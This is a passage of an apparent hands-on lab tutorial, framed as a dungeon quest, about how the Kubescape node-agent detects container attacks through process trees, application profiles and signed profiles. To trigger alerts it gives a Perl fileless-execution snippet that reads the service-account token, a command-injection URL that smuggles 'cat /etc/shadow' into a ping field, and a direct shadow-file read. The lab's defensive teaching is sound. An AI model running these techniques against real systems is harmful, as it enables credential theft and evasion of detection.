  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”΄β”€β”€β”€β”€β”΄β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”˜
    arg[0]              arg[1]   arg[2] ← the FULL C2 target is right here

Read the chain of alerts for the full C2 evidence, observing how the pcomm (parent command) tells you where the process was spawned/forked from:

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=100  | jq 'select(.RuleID == "R0001") '

The Time

Room 4: The Hall of Time

A vast hall dominated by a mechanical clock. Events arrive from every direction --- exec, open, DNS, HTTP --- each stamped with nanosecond precision. A brass sign reads: "None shall pass out of turn."

  exec events ──┐
  open events ───     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  dns events  ──┼────>β”‚  OrderedEventQueue (min-heap)     β”‚
  net events  ───     β”‚                                   β”‚
  fork events β”€β”€β”˜     β”‚  priority = timestamp.UnixNano()  β”‚
                      β”‚                                   β”‚
                      β”‚  β”Œβ”€β”€β”€β”¬β”€β”€β”€β”¬β”€β”€β”€β”¬β”€β”€β”€β”¬β”€β”€β”€β”¬β”€β”€β”€β”        β”‚
                      β”‚  β”‚t=1β”‚t=2β”‚t=3β”‚t=4β”‚t=5β”‚...β”‚        β”‚
                      β”‚  β””β”€β”€β”€β”΄β”€β”€β”€β”΄β”€β”€β”€β”΄β”€β”€β”€β”΄β”€β”€β”€β”΄β”€β”€β”€β”˜        β”‚
                      β”‚     β–² oldest pops first           β”‚
                      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                     β”‚
                      every 50ms β”€β”€β”€β”€β”˜
                                     β”‚
                      β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                      β”‚  eventProcessingLoop (ticker)       β”‚
                      β”‚  processQueueBatch() β†’ enrichAndPro β”‚
                      β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

The OrderedEventQueue is keyed by nanosecond wall-clock timestamps. Events from different eBPF probes can arrive out of order . The queue re-orders them.

The eventProcessingLoop in container_watcher.go drains the queue every 50 milliseconds. If the queue fills up, a fullQueueAlert channel triggers an immediate drain.

Quest: The Two Clocks --- Why R0001 Arrives 10-22 Seconds Before R0003

the two clock side quest

For our fileless exec, the execve("/proc/self/fd/3") event enters the queue with its nanosecond timestamp and waits at most 50ms before being popped. Fire the (pseudo) exploit again and watch the timestamps closely:

Recreate the triggers of the pseudo attack
# Terminal 1 β€” watch alerts, capture timestamps
kubectl logs -n kubescape -l app=node-agent -c node-agent -f \
  | jq -r 'select(.RuleID) | "\(.BaseRuntimeMetadata.timestamp) \(.RuleID) \(.message)"'
# Terminal 2 β€” fire the fileless exec
kubectl -n redis exec "$REDIS_POD" -- perl -e '
use strict; use warnings;
my $name = "pwned";
my $fd = syscall(279, $name, 0);
if ($fd < 0) { $fd = syscall(319, $name, 0); }
die "memfd_create failed\n" if $fd < 0;
open(my $src, "<:raw", "/bin/cat") or die;
open(my $dst, ">&=", $fd) or die;
binmode $dst; my $buf;
while (read($src, $buf, 8192)) { print $dst $buf; }
close $src;
exec {"/proc/self/fd/$fd"} "cat",
  "/var/run/secrets/kubernetes.io/serviceaccount/token";
'

You'll see something like:

17:12:18.988Z  R0001  Unexpected process launched              ← instant
17:12:18.987Z  R0006  Unexpected service account token access  ← instant
17:12:18.989Z  R0001  Unexpected process launched              ← instant
17:12:23.514Z  R1005  Fileless execution detected              ← instant
17:12:40.344Z  R0003  Syscalls Anomalies in container          ← ~9-22s later!
17:12:40.332Z  R0003  Syscalls Anomalies in container          ← ~9-22s later!
17:12:40.364Z  R0003  Syscalls Anomalies in container          ← ~9-22s later!

Why the gap? The two alert types use completely different eBPF gadgets with different collection models:

        trace_exec (R0001, R1005)                                    advise_seccomp (R0003)                                                             
    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                     β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”                                     
    β”‚ model: per-event                     β”‚                     β”‚ model: periodic batch                    β”‚                                     
    β”‚                                      β”‚                     β”‚                                          β”‚                                     
    β”‚                                      β”‚                     β”‚ syscalls accumulate in eBPF map (bitmap) β”‚                                     
    β”‚                                      β”‚                     β”‚   ...up to 30 seconds...                 β”‚                                     
    β”‚                                      β”‚                     β”‚ map-fetch-interval fires                 β”‚                                     
    β”‚ execve fires                         β”‚                     β”‚   ↓ flush entire bitmap                  β”‚                                     
    β”‚   ↓ immediate                        β”‚                     β”‚                                          β”‚                                     
    β”‚ Subscribe callback                   β”‚                     β”‚ Subscribe callback                       β”‚
    β”‚   ↓ <1ms                             β”‚                     β”‚   ↓ decode 256-byte map                  β”‚                                     
    β”‚ OrderedEventQueue                    β”‚                     β”‚ OrderedEventQueue                        β”‚                                     
    β”‚   ↓ ≀50ms                            β”‚                     β”‚   ↓ ≀50ms                                β”‚
    β”‚ Alert fires                          β”‚                     β”‚ Alert fires                              β”‚                                     
    β”‚                                      β”‚                     β”‚                                          β”‚
    β”‚ total: ~100ms                        β”‚                     β”‚ total: up to ~30s                        β”‚                                     
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                     β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

The SyscallTracer loads the advise_seccomp gadget with a hardcoded 30-second map-fetch interval. Instead of emitting one event per syscall (which would be millions per second), it accumulates a 256-byte bitmap of which syscalls were used, then flushes the entire bitmap to userspace every 30 seconds.

Source code -- SyscallTracer uses 30s batch interval

pkg/containerwatcher/v2/tracers/syscall.go:68-71

params := map[string]string{
    "operator.oci.ebpf.map-fetch-count":    "0",
    "operator.oci.ebpf.map-fetch-interval": "30s",  
    "operator.LocalManager.host":           "true",
}

Compare with the ExecTracer which uses real-time Subscribe callbacks (no batching):

pkg/containerwatcher/v2/tracers/exec.go:113-116

d.Subscribe(func(source datasource.DataSource, data datasource.Data) error {
    et.callback(&utils.DatasourceEvent{...})  // fires per-event
    return nil
}, opPriority)

You now understand why the Timekeeper's clock has two speeds. The Exec Scribes deliver scrolls the instant they are written. The Syscall Scribes gather a day's worth of tallies and deliver them in a single sack every 30 seconds. Both enter the Hall of Time, but one arrives much later than the other.

Room 5 -- The Loremaster's Study

Room 5: The Loremaster's Study

An ancient sage sits surrounded by floating crystal orbs, each containing the family tree of a running process. When an event arrives, the Loremaster traces its lineage back to the container's init process. The event enters as a bare fact; it leaves as a story.

  OrderedEventQueue                         EventEnricher
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”     enrichAndProcess    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ EventEntry    β”‚ ───────────────────>    β”‚ EnrichedEvent {              β”‚
  β”‚   event       β”‚                         β”‚   Event:       <original>    β”‚
  β”‚   containerID β”‚                         β”‚   ProcessTree: redis-server  β”‚
  β”‚   processID   β”‚                         β”‚                └─ perl       β”‚
  β”‚   timestamp   β”‚                         β”‚                   └─ cat(3)  β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜                         β”‚   ContainerID: "9cd796..."   β”‚
                                            β”‚   Timestamp:   <ns>          β”‚
                                            β”‚   PID:         51120         β”‚
                                            β”‚ }                            β”‚
                                            β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
                                                           β”‚
                                          β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
                                          β”‚                β”‚                β”‚
                                          β–Ό                β–Ό                β–Ό
                                     ProfileMgr      RuleManager      MalwareMgr
                                     (Room 6)        (Room 8)         (signatures)

The EventEnricher does two things:

  1. Reports the event to the process tree manager --- for exec events, this updates the in-memory process tree with the new process
  2. Retrieves the container's process tree --- for our Redis exploit, this produces: redis-server β†’ perl β†’ cat (execve from /proc/self/fd/3)

The result is an EnrichedEvent that carries the original event, the process tree, container ID, timestamp, and PID.

Source code -- EventEnricher.EnrichEvents builds the process tree

pkg/containerwatcher/v2/event_enricher.go:28-54

func (ee *EventEnricher) EnrichEvents(entry EventEntry) *ebpfevents.EnrichedEvent {
    var processTree apitypes.Process

    if isProcessTreeEvent(eventType) { // exec, fork, exit are process tree events
        ee.processTreeManager.ReportEvent(eventType, event)
        processTree, _ = ee.processTreeManager.GetContainerProcessTree(
            entry.ContainerID, entry.ProcessID, false)
    }

    return &ebpfevents.EnrichedEvent{
        Event:       event,
        ProcessTree: processTree,
        ContainerID: entry.ContainerID,
        Timestamp:   entry.Timestamp,
        PID:         entry.ProcessID,
    }
}

The Dispatch --- Fan-Out to Handlers

After enrichment, the event enters the worker pool and is dispatched by EventHandlerFactory.ProcessEvent() to all handlers registered for ExecveEventType:

  enrichedEvent ──> workerPool.Invoke() ──> ProcessEvent()
                                                β”‚
                    handlers[ExecveEventType] = [
                      containerProfileManager,  ← Room 6 (records "normal")
                      ruleManager,              ← Room 8 (evaluates R1005)
                      malwareManager,           ← signature scan
                      metrics,                  ← prometheus counters
                      rulePolicy                ← policy validation
                    ]

All five handlers receive the same EnrichedEvent. The profile manager records it (if still learning). The rule manager judges it (if learning is done). Both see the same exepath: "/proc/self/fd/3".

Source code -- Handler registration for exec events

pkg/containerwatcher/v2/event_handler_factory.go:224

ehf.handlers[utils.ExecveEventType] = []Manager{
    containerProfileManager, ruleManager, malwareManager, metrics, rulePolicy,
}

ProcessEvent() iterates handlers and calls ReportEnrichedEvent() on each:

for _, handler := range handlers {
    if enrichedHandler, ok := handler.(EnrichedEventReceiver); ok {
        enrichedHandler.ReportEnrichedEvent(enrichedEvent)
    }
}
The ApplicationProfile -- the Tome of Behavior

Quest: See the process tree in the alert

After running the fileless exec from Unit 1, check the alert JSON:

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=2000 | grep "R1005" | head -1 | python3 -m json.tool

    "RuntimeProcessDetails": {
        "processTree": {
            "pid": 25489,
            "cmdline": "/proc/self/fd/3 /var/run/secrets/kubernetes.io/serviceaccount/token",
            "comm": "3",
            "ppid": 9806,
            "pcomm": "containerd-shim",
            "uid": 999,
            "gid": 999,
            "path": "memfd:pwned"
        },

Side Quest: The Command Injector

A trapped chest sits in the corner of the Study. Its lock accepts any string β€” even one laced with poison.

The Loremaster's Study

Challenge: Deploy a vulnerable webapp, inject `; cat index.html, and watch the Loremaster's process tree expose the attack chain.

Install the infamous webapp

Step 1 β€” Apply the ApplicationProfile (SBoB)

Instead of waiting for a learning period, we supply a pre-built ApplicationProfile. The profile must exist before the pod starts so the node-agent finds it.

kubectl create namespace webapp

kubectl apply -f - <<'EOF'
apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: ApplicationProfile
metadata:
  name: webapp-profile-wildcard
  namespace: webapp
spec:
  architectures:
  - amd64
  containers:
  - capabilities:
    - CAP_DAC_OVERRIDE
    - CAP_SETGID
    - CAP_SETUID
    endpoints: null
    execs:
    - args:
      - /usr/bin/dirname
      - /var/run/apache2
      path: /usr/bin/dirname
    - args:
      - /usr/bin/dirname
      - /var/lock/apache2
      path: /usr/bin/dirname
    - args:
      - /usr/bin/dirname
      - /var/log/apache2
      path: /usr/bin/dirname
    - args:
      - /bin/mkdir
      - -p
      - /var/run/apache2
      path: /bin/mkdir
    - args:
      - /usr/local/bin/apache2-foreground
      path: /usr/local/bin/apache2-foreground
    - args:
      - /bin/rm
      - -f
      - /var/run/apache2/apache2.pid
      path: /bin/rm
    - args:
      - /bin/mkdir
      - -p
      - /var/log/apache2
      path: /bin/mkdir
    - args:
      - /bin/mkdir
      - -p
      - /var/lock/apache2
      path: /bin/mkdir
    - args:
      - /usr/sbin/apache2
      - -DFOREGROUND
      path: /usr/sbin/apache2
    - args:
      - /usr/local/bin/docker-php-entrypoint
      - apache2-foreground
      path: /usr/local/bin/docker-php-entrypoint
    - args:
      - /usr/bin/touch
      - '*'
      path: /usr/bin/touch
    identifiedCallStacks: null
    imageID: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
    imageTag: ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b
    name: mywebapp-app
    opens:
    - flags:
      - O_APPEND
      - O_CLOEXEC
      - O_CREAT
      - O_DIRECTORY
      - O_EXCL
      - O_NONBLOCK
      - O_RDONLY
      - O_RDWR
      - O_WRONLY
      path: //var/www/html/*
    rulePolicies: {}
    seccompProfile:
      spec:
        defaultAction: ""
    syscalls:
    - accept4
    - access
    - arch_prctl
    - bind
    - brk
    - capget
    - capset
    - chdir
    - chmod
    - clone
    - close
    - close_range
    - connect
    - dup2
    - dup3
    - epoll_create1
    - epoll_ctl
    - epoll_pwait
    - execve
    - exit
    - exit_group
    - faccessat2
    - fcntl
    - fstat
    - fstatfs
    - futex
    - getcwd
    - getdents64
    - getegid
    - geteuid
    - getgid
    - getpgrp
    - getpid
    - getppid
    - getrandom
    - getsockname
    - gettid
    - getuid
    - ioctl
    - listen
    - lseek
    - mkdir
    - mmap
    - mprotect
    - munmap
    - nanosleep
    - newfstatat
    - openat
    - openat2
    - pipe
    - prctl
    - prlimit64
    - read
    - recvfrom
    - recvmsg
    - rename
    - rt_sigaction
    - rt_sigprocmask
    - rt_sigreturn
    - select
    - sendto
    - set_robust_list
    - set_tid_address
    - setgid
    - setgroups
    - setsockopt
    - setuid
    - sigaltstack
    - socket
    - stat
    - statfs
    - statx
    - sysinfo
    - tgkill
    - times
    - tkill
    - umask
    - uname
    - unknown
    - unlinkat
    - wait4
    - write
status: {}
EOF

Notice what's in the profile: dirname, mkdir, rm, touch, apache2, docker-php-entrypoint β€” the normal apache startup sequence. Crucially, sh and cat are not in the execs list. Any process outside this list triggers R0001.

Step 2 β€” Deploy the webapp

Now that the profile exists, deploy the webapp. The kubescape.io/user-defined-profile: webapp-profile-wildcard label tells the node-agent to use our pre-built SBoB β€” detection starts the moment the container is ready.

kubectl apply -f - <<'EOF'
apiVersion: apps/v1
kind: Deployment
metadata:
  name: webapp-mywebapp
  namespace: webapp
  labels:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
spec:
  replicas: 1
  selector:
    matchLabels:
      app.kubernetes.io/name: mywebapp
      app.kubernetes.io/instance: webapp
  template:
    metadata:
      labels:
        app.kubernetes.io/name: mywebapp
        app.kubernetes.io/instance: webapp
        kubescape.io/user-defined-profile: webapp-profile-wildcard
    spec:
      serviceAccountName: default
      containers:
        - name: mywebapp-app
          image: "ghcr.io/k8sstormcenter/webapp@sha256:e323014ec9befb76bc551f8cc3bf158120150e2e277bae11844c2da6c56c0a2b"
          imagePullPolicy: Always
          ports:
            - name: http
              containerPort: 80
              protocol: TCP
          volumeMounts:
            - mountPath: /host/var/log
              name: nodelog
      volumes:
        - name: nodelog
          hostPath:
            path: /var/log
---
apiVersion: v1
kind: Service
metadata:
  name: webapp-mywebapp
  namespace: webapp
  labels:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
spec:
  type: ClusterIP
  ports:
    - port: 8080
      targetPort: 80
      protocol: TCP
      name: http
  selector:
    app.kubernetes.io/name: mywebapp
    app.kubernetes.io/instance: webapp
EOF

Wait for the pod to be ready:

kubectl -n webapp wait --for=condition=ready pod -l app.kubernetes.io/name=mywebapp --timeout=120s

Step 3 β€” Inject the command

The webapp has a ping feature that passes user input directly to a shell. From inside the cluster, inject ; cat /etc/shadow:

sudo kill -9 $(sudo lsof -t -i :8080) 2>/dev/null || true
kubectl --namespace webapp port-forward $(kubectl get pods --namespace webapp -l "app.kubernetes.io/name=mywebapp,app.kubernetes.io/instance=webapp" -o jsonpath="{.items[0].metadata.name}") 8080:80 &
curl "127.0.0.1:8080/ping.php?ip=1.1.1.1%3Bcat%20/etc/shadow"

You should see not yet the contents of shadow in the response β€” the command injection used a user (www) that didnt have access to /etc/shadow.

Step 4 β€” Read the alert

kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=5000  | grep -E "R0001|R0010" | jq

So, now, let's grab /etc/shadow in a more brutal way :

WEBAPP_POD=$(kubectl get pods --namespace webapp -l "app.kubernetes.io/name=mywebapp,app.kubernetes.io/instance=webapp" -o jsonpath="{.items[0].metadata.name}")

kubectl exec -n webapp $WEBAPP_POD -- sh -c 'cat /etc/shadow'

Look for two rules firing:

  • R0001 β€” Unexpected process launched: cat was never seen during learning, so it's unexpected
  • R0010 β€” Unexpected sensitive file access: /etc/shadow is a sensitive path that is not under /var/www/html

So, with /etc/shadow, we have a predefined rule, that lets us know, that this is a crucial file and cat cas no business reading it. But, in the Injection case, we can use the process tree reconstruction to tell us that and apache server running cat is malicious. View the RuntimeProcessDetails.processTree

   "RuntimeProcessDetails": {
    "processTree": {
      "pid": 52414,
      "cmdline": "apache2 -DFOREGROUND",
      "comm": "apache2",
      "ppid": 52187,
      "pcomm": "containerd-shim",
      "uid": 0,
      "gid": 0,
      "startTime": "0001-01-01T00:00:00Z",
      "cwd": "/var/www/html",
      "path": "/usr/sbin/apache2",
      "childrenMap": {
        "apache2␟52441": {
          "pid": 52441,
          "cmdline": "apache2 -DFOREGROUND",
          "comm": "apache2",
          "ppid": 52414,
          "pcomm": "apache2",
          "uid": 33,
          "gid": 33,
          "startTime": "0001-01-01T00:00:00Z",
          "cwd": "/var/www/html",
          "path": "/usr/sbin/apache2",
          "childrenMap": {
            "sh␟54441": {
              "pid": 54441,
              "cmdline": "/bin/sh -c ping -c 4 1.1.1.1;cat /etc/shadow",
              "comm": "sh",
              "ppid": 52441,
              "pcomm": "apache2",
              "uid": 33,
              "gid": 33,
              "startTime": "0001-01-01T00:00:00Z",
              "path": "/bin/dash",
              "childrenMap": {
                "cat␟54449": {
                  "pid": 54449,
                  "cmdline": "/bin/cat /etc/shadow",
                  "comm": "cat",
                  "ppid": 54441,
                  "pcomm": "sh",
                  "uid": 33,
                  "gid": 33,
                  "startTime": "0001-01-01T00:00:00Z",
                  "path": "/bin/cat"
                }
              }
            }
Cleanup β€” remove the webapp
kubectl delete namespace webapp

The Loremaster finishes his work. The execve event now carries its full lineage and Kubernetes identity. Copies are dispatched: one to the Archive for recording, another to the Inquisitor for judgment.

Room 6 -- The Great Archive

Room 6: The Great Archive

Massive filing cabinets stretch from floor to ceiling, one drawer for each container. A meticulous librarian sorts incoming events into labeled drawers. "If I have seen it before," she says, "it is normal. If I have not --- that is for the Inquisitor to decide."

The ApplicationProfile -- the Tome of Behavior

The Profile Manager records every exec, endpoint, open, syscall, and capability observed by the Inspector Gadget-tracer during the learning period into an ApplicationProfile CRD.

#save this as bob.yaml
apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: ApplicationProfile
metadata:
  name: bob
spec:
  architectures:
  - amd64
  containers:
  - name: redis
    capabilities: null
    endpoints: null
    execs: null
    opens: null
    syscalls: null
    rulePolicies: {}

It supports:

  • Deduplication: redis-cli can be exec'd 1000 times; only one entry.
  • Flag merging: If /etc/resolv.conf is opened first with O_RDONLY then with O_WRONLY, flags merge to [O_RDONLY, O_WRONLY]

Out of the box, these profiles can be VERY long and overly specific. Lets look at some tricks to make them more robust.

Quest: Building a Bill of Behavior (APs, NNs, Signatures and RulePolicies)

The ApplicationProfile -- the Tome of Behavior

1) Profile Dependency and RulePolicies

There are three types of rules:

By default, R1005 (Fileless execution detected) does NOT depend on an ApplicationProfile. It's a signature rule (a predefined Indicator of Compromise). The profile dependency is set to 2 (not required).

Let's go through, how you d change that: We will now allowlist R1005 via a RulePolicy in the profile. Three things are needed:

A) Lets start with an empty applicationprofile and step by step build a bill of behavior

Save the above YAML as bob.yaml and attach it to the redis container, but adding the label kubescape.io/user-defined-profile: bob to the redis pod.

kubectl apply -f bob.yaml -n redis
kubectl patch deployment redis -n redis --type merge -p '{"spec":{"template":{"metadata":{"labels":{"kubescape.io/user-defined-profile":"bob"}}}}}'

B) enable supportPolicy on R1005 in the rules CRD

kubectl edit rules default-rules -n kubescape

Find the R1005 entry and change supportPolicy: false to supportPolicy: true:

- name: "Fileless execution detected"
  id: "R1005"
  ...
  supportPolicy: true

C) add a rulePolicies stanza to the AP container spec

kubectl edit applicationprofiles.spdx.softwarecomposition.kubescape.io -n redis bob

  rulePolicies:
    R1005:
      processAllowed:
      - "3"

Or to allowlist the entire container for R1005 (any fileless exec is okay):

  rulePolicies:
    R1005:
      containerAllowed: true

D) Make it active:

kubectl rollout restart deployment redis -n redis

And repeating our fileless exec test

REDIS_POD=$(kubectl -n redis get pod -l app.kubernetes.io/name=redis \
  -o jsonpath='{.items[0].metadata.name}')
kubectl -n redis exec "$REDIS_POD" -- perl -e '
use strict; use warnings;
my $name = "pwned";
my $fd = syscall(279, $name, 0);
if ($fd < 0) { $fd = syscall(319, $name, 0); }
die "memfd_create failed\n" if $fd < 0;
open(my $src, "<:raw", "/bin/cat") or die;
open(my $dst, ">&=", $fd) or die;
binmode $dst; my $buf;
while (read($src, $buf, 8192)) { print $dst $buf; }
close $src;
exec {"/proc/self/fd/$fd"} "cat",
  "/var/run/secrets/kubernetes.io/serviceaccount/token";
'
kubectl logs -n kubescape -l app=node-agent -c node-agent --tail=500  | jq '.message'

Take the label on and off and repeat the attack, watch the "Fileless execution detected: exec call "3" is from a malicious source" appear/disappear Given that this is a completely empty profile, you'll also see everything else that is happening. You can use this as a strace for debugging.

Side Quest Inspect the ApplicationProfile
PROFILE=$(kubectl -n redis get applicationprofile -o jsonpath='{.items[0].metadata.name}')
kubectl -n redis get applicationprofile redis -o yaml | head -80

Check the execs section --- there is redis-cli but NOT perl or /proc/self/fd/3. That gap is what makes R0001 fire.

Check the syscalls section --- you should see normal Redis syscalls but NOT memfd_create. That gap triggers R0003.

Where does the profile live in the cluster?

The ApplicationProfile is a CRD stored in etcd via the Kubernetes API. It lives in the same namespace as the workload:

kubectl api-resources | grep applicationprofile
kubectl -n redis get applicationprofile

Last but not least, we reapply the original profile back to redis and reboot one more time

kubectl patch deployment redis -n redis --type merge -p '{"spec":{"template":{"metadata":{"labels":{"kubescape.io/user-defined-profile":"redis"}}}}}'
kubectl rollout restart deployment redis -n redis

Quest: The blessing of the Bill

No demogods required

The Archivist can also accept signatures. At the time of writing, we sign both ApplicationProfiles and NetworkNeighborhoods. We might also sign RulePolicies and CollapsConfigs in the future.

labels:
  kubescape.io/user-defined-profile: my-ap-name     # ApplicationProfile
  kubescape.io/user-defined-network: my-nn-name      # NetworkNeighborhood

When you use user-defined-profile , the learning the profile is skipped (network is more involved).

But how do you trust any scroll? Anyone could forge one.

The answer: cryptographic signing. A signed profile carries ECDSA annotations that the node-agent verifies before loading. A tampered profile fails verification and is rejected.

   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”   sign   β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
   β”‚  Unsigned Profile  β”‚  ──────> β”‚  Signed Profile                      β”‚
   β”‚  (AP or NN YAML)   β”‚          β”‚  + signature.kubescape.io/signature  β”‚
   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜          β”‚  + signature.kubescape.io/certificateβ”‚
                                   β”‚  + signature.kubescape.io/issuer     β”‚
                                   β”‚  + signature.kubescape.io/identity   β”‚
                                   β”‚  + signature.kubescape.io/timestamp  β”‚
                                   β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Signing an ApplicationProfile

In this quest you will:

  1. Build the signing tool and generate a key pair
  2. Sign an ApplicationProfile and a NetworkNeighborhood for the webapp
  3. Deploy the signed profiles, then the webapp
  4. Reach out to fusioncore.ai (legitimate) --- no alert
  5. Simulate a DNS MITM attack --- R0011 fires

We reuse the webapp from Room 5, with one modification: the AP now allows sh and ping (for the ping.php feature), and we add a NetworkNeighborhood that pins fusioncore.ai to its real IP 162.0.217.171.

Step 1 --- Generate a signing key

The sign-object CLI is published as a container image:

sign="ghcr.io/k8sstormcenter/sign-object@sha256:7b088be3a4408b4c0f259f1c2ee5d4bb1f9659e2716b217917bcf975063b7453"
docker pull $sign

Generate an ECDSA P-256 key pair:

docker run --rm -v $(pwd):/work $sign generate-keypair --output /work/bob.key

This produces bob.key (private) and bob.key.pub (public). The private key signs profiles; the node-agent uses the embedded certificate to verify.

Step 2 --- Save the unsigned profiles

webapp-ap.yaml --- the unsigned ApplicationProfile
cat <<'EOF' > webapp-ap.yaml
apiVersion: spdx.softwarecomposition.kubescape.io/v1beta1
kind: ApplicationProfile
metadata:
  name: webapp-ap
  namespace: webapp
spec:
  architectures:
  - amd64
  containers:
  - capabilities:
    - CAP_DAC_OVERRIDE
    - CAP_SETGID
    - CAP_SETUID
    endpoints:
    - direction: inbound
      endpoint: :8080/ping.php
      headers:
        Host:
        - 127.0.0.1:8080
      internal: false
      methods:
      - GET
    execs:
    - args:
      - /bin/sh
      - -c
      - ping -c 4 fusioncore.ai
      path: /bin/sh
    - args:
      - /usr/bin/dirname
      - /var/lock/apache2
      path: /usr/bin/dirname
    - args:
      - /usr/local/bin/docker-php-entrypoint
      - apache2-foreground
      path: /usr/local/bin/docker-php-entrypoint
    - args:
      - /bin/mkdir
      - -p
      - /var/log/apache2
      path: /bin/mkdir
    - args:
      - /usr/bin/dirname
      - /var/run/apache2
      path: /usr/bin/dirname
    - args:
      - /bin/mkdir
      - -p
      - /var/run/apache2
      path: /bin/mkdir
    - args:
      - /bin/ping
      - -c
      - "4"
      - fusioncore.ai
      path: /bin/ping
    - args:
      - /bin/mkdir
      - -p
      - /var/lock/apache2
      path: /bin/mkdir
    - args:
      - /usr/sbin/apache2
      - -DFOREGROUND
      path: /usr/sbin/apache2
    - args:
      - /usr/local/bin/apache2-foreground
      path: /usr/local/bin/apache2-foreground
    - args:
      - /bin/rm
      - -f
      - /var/run/apache2/apache2.pid
      path: /bin/rm
    - args:
      - /usr/bin/dirname
      - /var/log/apache2
      path: /usr/bin/dirname
    name: mywebapp-app
    opens:
    - path: /*
      flags: [O_RDONLY, O_WRONLY, O_RDWR, O_CREAT, O_APPEND, O_CLOEXEC, O_DIRECTORY, O_EXCL, O_NONBLOCK]
    syscalls:
    - accept4
    - access
    - arch_prctl
    - bind
    - brk
    - capget
    - capset
    - chdir
    - chmod
    - clone
    - close
    - close_range
    - connect
    - dup2
    - dup3
    - epoll_create1
    - epoll_ctl
    - epoll_pwait
    - execve
    - exit
    - exit_group
    - faccessat2
    - fcntl
    - fstat
    - fstatfs
    - futex
    - getcwd
    - getdents64
    - getegid
    - geteuid
    - getgid
    - getpgrp
    - getpid
    - getppid
    - getrandom
    - getsockname
    - getsockopt
    - gettid
    - getuid
    - ioctl
    - listen
    - lseek
    - lstat
    - mkdir
    - mmap
    - mprotect
    - munmap
    - nanosleep
    - newfstatat
    - openat
    - openat2
    - pipe
    - pipe2
    - poll
    - prctl
    - prlimit64
    - read
    - recvfrom
    - recvmsg
    - rename
    - rt_sigaction
    - rt_sigprocmask
    - rt_sigreturn
    - sched_yield
    - select
    - sendmmsg
    - sendto
    - set_robust_list
    - set_tid_address
    - setgid
    - setgroups
    - setitimer
    - setsockopt
    - setuid
    - shutdown
    - sigaltstack
    - socket
    - stat
    - statfs
    - statx
    - sysinfo
    - tgkill
    - times
    - tkill
    - umask
    - uname
    - unknown
    - unlinkat
    - vfork
    - wait4
